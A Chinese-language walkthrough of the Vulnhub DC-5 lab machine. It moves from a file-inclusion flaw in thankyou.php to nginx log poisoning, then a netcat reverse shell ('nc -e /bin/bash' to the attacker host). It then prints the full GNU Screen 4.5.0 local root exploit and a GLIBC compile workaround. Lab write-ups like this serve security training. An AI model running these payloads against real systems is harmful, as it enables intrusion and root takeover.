Vulnhub靶机渗透-DC5
文章目录
- Flag
- 总结
流程包含对Screen 4.5.0利用POC的“ version `GLIBC_2.34’ not found”报错问题解决
└─# arp-scan -l | grep 08:00:27:a0
192.168.1.101 08:00:27:a0:90:d4 PCS Systemtechnik GmbH
└─# nmap -Pn -p- -A 192.168.1.101 -o nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 16:10 CST
Nmap scan report for 192.168.1.101
Host is up (0.00027s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 38260/tcp status
| 100024 1 43672/tcp6 status
| 100024 1 46899/udp6 status
|_ 100024 1 48339/udp status
38260/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:A0:90:D4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.27 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds
└─# dirsearch -u http://192.168.1.101
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Vulnhub/DC5/reports/http_192.168.1.101/_25-02-12_16-14-03.txt
Target: http://192.168.1.101/
[16:14:03] Starting:
[16:14:16] 200 - 4KB - /contact.php
[16:14:17] 301 - 184B - /css -> http://192.168.1.101/css/
[16:14:19] 200 - 6KB - /faq.php
# 扫到footer.php,每次刷新都会变化;刷新在Web主页Contact填写信息后跳转的thankyou.php也会变化,那么大概率是有包含
[16:14:20] 200 - 17B - /footer.php
[16:14:21] 301 - 184B - /images -> http://192.168.1.101/images/
[16:14:21] 403 - 570B - /images/
[16:14:38] 200 - 852B - /thankyou.php
Task Completed
尝试bp爆破包含文件的参数,字典用项目paramDict中的burp.txt即可
![![[Pasted image 20250212174903.png]]](https://i-blog.csdnimg.cn/direct/7d693f98c8d24885a7285c940d5aee4f.png)
得到参数为file
![![[Pasted image 20250212174535.png]]](https://i-blog.csdnimg.cn/direct/907c327106294eb7bc36949356e15365.png)
先查看一下Nginx的配置,http://192.168.1.101/thankyou.php?file=/etc/nginx/nginx.conf
开启了访问日志(access_log)和错误日志(error_log)
![![[Pasted image 20250213101017.png]]](https://i-blog.csdnimg.cn/direct/24968c43372e46f783fbf7d52cf67fdd.png)
先看一下错误日志,http://192.168.1.101/thankyou.php?file=/var/log/nginx/error.log
可以看到记录了referrer头和url
![![[Pasted image 20250213101844.png]]](https://i-blog.csdnimg.cn/direct/effc6e21db5a4dc18d79c4233aee1cf5.png)
尝试浏览器传马,会发现<>被浏览器转译
![![[Pasted image 20250213102705.png]]](https://i-blog.csdnimg.cn/direct/8240519e9ea3496eb29d06b51d2de31a.png)
使用bp传马
![![[Pasted image 20250213154022.png]]](https://i-blog.csdnimg.cn/direct/133db13b7bb146c9affe70b54234090b.png)
测试可执行
![![[Pasted image 20250213154136.png]]](https://i-blog.csdnimg.cn/direct/200cd44218dd41efa57bf233d0660c79.png)
反弹shell
先监听,bp再发包,nc -e /bin/bash 192.168.1.99 8888
![![[Pasted image 20250213154859.png]]](https://i-blog.csdnimg.cn/direct/476cba084d29442d92431f1f9939df51.png)
└─# nc -lvvp 8888
listening on [any] 8888 ...
192.168.1.101: inverse host lookup failed: Unknown host
connect to [192.168.1.99] from (UNKNOWN) [192.168.1.101] 36679
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-5:~/html$
提权
www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
exim不能完全得到root权限,用screen作为突破口
└─# searchsploit --id screen
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | EDB-ID
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | 41154
└─# searchsploit -p 41154
Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/41154
Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
Codes: N/A
Verified: True
File Type: Bourne-Again shell script, ASCII text executable
┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root/Vulnhub/DC5/screen.sh
┌──(root㉿kali)-[~]
└─# cd Vulnhub/DC5/
# 开启http服务
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# python -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
└─# cat screen.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
根据文件内容创建文件
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# vim libhax.c
内容
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# vim rootshell.c
内容
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
# 编译
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# gcc -fPIC -shared -ldl -o libhax.so libhax.c
libhax.c: In function 'dropshell':
libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
7 | chmod("/tmp/rootshell", 04755);
| ^~~~~
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# gcc -o rootshell rootshell.c
rootshell.c: In function 'main':
rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
3 | setuid(0);
| ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
4 | setgid(0);
| ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
5 | seteuid(0);
| ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
6 | setegid(0);
| ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
7 | execvp("/bin/sh", NULL, NULL);
| ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function 'execvp' expecting 2 [-Wbuiltin-declaration-mismatch]
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# ls
arp-scan.txt libhax.c libhax.so nmap.txt reports rootshell rootshell.c screen.sh
# 删除所有c文件
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# rm *.c
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# ls
arp-scan.txt libhax.so nmap.txt reports rootshell screen.sh
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# cat -n screen.sh
1 #!/bin/bash
2 # screenroot.sh
3 # setuid screen v4.5.0 local root exploit
4 # abuses ld.so.preload overwriting to get root.
5 # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
6 # HACK THE PLANET
7 # ~ infodox (25/1/2017)
8 echo "~ gnu/screenroot ~"
9 echo "[+] First, we create our shell and library..."
10 cat << EOF > /tmp/libhax.c
11 #include <stdio.h>
12 #include <sys/types.h>
13 #include <unistd.h>
14 __attribute__ ((__constructor__))
15 void dropshell(void){
16 chown("/tmp/rootshell", 0, 0);
17 chmod("/tmp/rootshell", 04755);
18 unlink("/etc/ld.so.preload");
19 printf("[+] done!\n");
20 }
21 EOF
22 gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
23 rm -f /tmp/libhax.c
24 cat << EOF > /tmp/rootshell.c
25 #include <stdio.h>
26 int main(void){
27 setuid(0);
28 setgid(0);
29 seteuid(0);
30 setegid(0);
31 execvp("/bin/sh", NULL, NULL);
32 }
33 EOF
34 gcc -o /tmp/rootshell /tmp/rootshell.c
35 rm -f /tmp/rootshell.c
36 echo "[+] Now we create our /etc/ld.so.preload file..."
37 cd /etc
38 umask 000 # because
39 screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
40 echo "[+] Triggering..."
41 screen -ls # screen itself is setuid, so...
42 /tmp/rootshell
# 删除1-36行内容
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# vim screen.sh
内容
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
下载到/tmp目录
www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/screen.sh
wget http://192.168.1.99:9999/screen.sh
converted 'http://192.168.1.99:9999/screen.sh' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/screen.sh' (UTF-8)
--2025-02-13 19:44:44-- http://192.168.1.99:9999/screen.sh
Connecting to 192.168.1.99:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 190 [text/x-sh]
Saving to: 'screen.sh'
screen.sh 100%[=====================>] 190 --.-KB/s in 0s
2025-02-13 19:44:44 (44.8 MB/s) - 'screen.sh' saved [190/190]
www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/libhax.so
wget http://192.168.1.99:9999/libhax.so
converted 'http://192.168.1.99:9999/libhax.so' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/libhax.so' (UTF-8)
--2025-02-13 19:45:08-- http://192.168.1.99:9999/libhax.so
Connecting to 192.168.1.99:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15528 (15K) [application/octet-stream]
Saving to: 'libhax.so'
libhax.so 100%[=====================>] 15.16K --.-KB/s in 0.01s
2025-02-13 19:45:08 (1.51 MB/s) - 'libhax.so' saved [15528/15528]
www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/rootshell
wget http://192.168.1.99:9999/rootshell
converted 'http://192.168.1.99:9999/rootshell' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/rootshell' (UTF-8)
--2025-02-13 19:45:17-- http://192.168.1.99:9999/rootshell
Connecting to 192.168.1.99:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16168 (16K) [application/octet-stream]
Saving to: 'rootshell'
rootshell 100%[=====================>] 15.79K --.-KB/s in 0s
2025-02-13 19:45:17 (505 MB/s) - 'rootshell' saved [16168/16168]
www-data@dc-5:/tmp$ ls
ls
libhax.so rootshell screen.sh
赋予文件权限并执行
www-data@dc-5:/tmp$ chmod 777 screen.sh
chmod 777 screen.sh
www-data@dc-5:/tmp$ ./screen.sh
./screen.sh
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
/tmp/rootshell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by /tmp/rootshell)
# 正常流程这里会返回root权限,看报错问题出在版本,问题文件是rootshell
www-data@dc-5:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
引用大佬文章的一段话
出现报错的原因就是在靶机环境中没有找到GLIBC_2.34版本
因为反弹shell得到靶机的shell环境比较难用,所以大部分人会在自己主机编译完最后再把文件传入到靶机环境中,这样比较方便
但是当把rootshell.c文件在自己kali主机上使用gcc命令编译时,如果自己主机的GLIBC版本比较高,而dc5靶机的版本较低时就会出现上面的报错
————————————————
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/weixin_73904941/article/details/142856475
那么我们将rootshell.c在靶机中编译
www-data@dc-5:/tmp$ wget http://192.168.1.99:8888/rootshell.c
wget http://192.168.1.99:8888/rootshell.c
converted 'http://192.168.1.99:8888/rootshell.c' (ANSI_X3.4-1968) -> 'http://192.168.1.99:8888/rootshell.c' (UTF-8)
--2025-02-14 11:46:47-- http://192.168.1.99:8888/rootshell.c
Connecting to 192.168.1.99:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 135 [text/x-csrc]
Saving to: 'rootshell.c'
rootshell.c 100%[=====================>] 135 --.-KB/s in 0s
2025-02-14 11:46:47 (33.0 MB/s) - 'rootshell.c' saved [135/135]
www-data@dc-5:/tmp$ gcc -o rootshell rootshell.c
gcc -o rootshell rootshell.c
# 找不到cc1的位置
gcc: error trying to exec 'cc1': execvp: No such file or directory
# 查找本机中是否有
www-data@dc-5:/tmp$ find / -name cc1 2>/dev/null
find / -name cc1 2>/dev/null
/usr/lib/gcc/x86_64-linux-gnu/4.9/cc1
# 查看环境变量中是否有gcc的安装路径
www-data@dc-5:/tmp$ echo $PATH
echo $PATH
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
# 添加临时环境变量
www-data@dc-5:/tmp$ export PATH="/usr/lib:$PATH"
export PATH="/usr/lib:$PATH"
# 很好,编译成功!
www-data@dc-5:/tmp$ gcc -o rootshell rootshell.c
gcc -o rootshell rootshell.c
www-data@dc-5:/tmp$ ls
ls
rootshell rootshell.c
# 再次尝试
www-data@dc-5:/tmp$ ./screen.sh
./screen.sh
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
Flag
# id
id
# 成功提权root!
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# find / -name *flag.*
find / -name *flag.*
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/root/thisistheflag.txt
# cat /root/thisistheflag.txt
cat /root/thisistheflag.txt
888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.
总结
细致观察测试每一个页面,都可能存在突破口
遇到报错不慌张,细致地慢慢解决